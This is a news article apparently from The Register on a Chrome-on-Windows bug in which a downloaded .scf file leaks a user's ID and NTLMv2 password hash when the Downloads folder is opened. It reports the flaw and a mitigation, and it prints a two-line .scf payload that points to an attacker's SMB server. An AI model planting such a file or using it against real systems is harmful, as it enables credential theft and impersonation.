Security

Chrome on Windows has credential theft bug

.SCF files present ID, password to fetch icons for attack file

By Richard Chirgwin

11 SHARE

Google's Chrome team is working to fix a credential theft bug that strikes if the browser is running on Microsoft Windows.

The bug is exploited if a user is tricked into clicking a link that downloads a Windows .scf file (the ancient Shell Command File format, a shortcut to Show Desktop since Windows 98).

This exploits two things: how Chrome handles .scf files, and how Windows handles them.

Most download links are sanitised by Chrome – for example, as discoverers DefenseCode write, since Stuxnet the browser has forced a .download extension onto Windows LNK files – but not .scf files.

That arrangement means that if the user clicks the link, the malicious .scf file will lie dormant in the /Downloads directory until the next time the user opens the folder.

Here's where the Windows flaw comes in: merely viewing the folder will trigger Windows to try and retrieve an icon associated with the .scf file.

To retrieve the icon, the user's machine will present credentials to a server – their user ID and hashed password on a corporate network, or the home group's credentials if it's a personal machine.

Naturally enough, since this involves credentials, they're available to the attacker.

If the .scf file contains this code:

[Shell]
IconFile=\\170.170.170.170\icon

… then the user ID and hashed password will be presented to the attacker's IP.

Since it's an NTLMv2 hashed password, to recover it would need offline brute-force cracking, but SecureCode points out that user ID and the hash can be presented to other services.

“The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password” writes Defense Code's Bosko Stankovic [emphasis added].

Password brute-forcing is only moderately difficult, the post says: an NVIDIA GTX 1080 card should manage to recover an eight-character password in less than a day.

While users wait for a fix from Google, Chrome users should get to their Advanced settings, and make Chrome ask where downloaded files are to be saved: that way, the .scf extension will be revealed.

Google told Kaspersky's ThreatPost it's aware of the issue and is working on a fix. ®

Sign up to our NewsletterGet IT in your inbox daily

11 Comments

More from The Register

On the first day of Christmas, Microsoft gave to me... an emergency out-of-band security patch for IE

Update Internet Explorer now after Google detects attacks in the wild

Is Google purposefully breaking Microsoft, Apple browsers on its websites? Some insiders are confident it is

Analysis Google's doing to Microsoft what Microsoft did to everyone in the 1990s... allegedly, cough

Google is 20, Chrome is 10, and Microsoft would rather ignore the Nokia deal's 5th birthday

Party poppers in Mountain View, party poopers in Redmond

Insiders! The good news: Windows 10 Sandbox is here for testing. Bad news: Microsoft has already broken it

New hotness turned to old and busted in record time thanks to Internet Explorer update

Google's Project Zero reveals another Microsoft flaw

Edge, IE can find themselves running unexpected code if cooked by a malicious site

Microsoft polishes up Chromium as EdgeHTML peers into the abyss

When you gaze long into an abyss, the abyss gazes into you. Or is that just Windows Hello?

Microsoft drops rush Internet Explorer fix for remote code exec hole

IE 7 through 11 needs a big band-aid, fast, especially workstations, terminal servers

It's October 2018, and Microsoft Exchange can be pwned by a plucky eight-year-old... bug

Redmond goes retro in latest Patch Tuesday bundle

Stroppy Google runs rings round Brussels with Android remedy

Comment It's playing a long game

ANN-IE-LATION: Microsoft to axe support for older Internet Explorer next week

Don't say we didn't warn ya ... because we did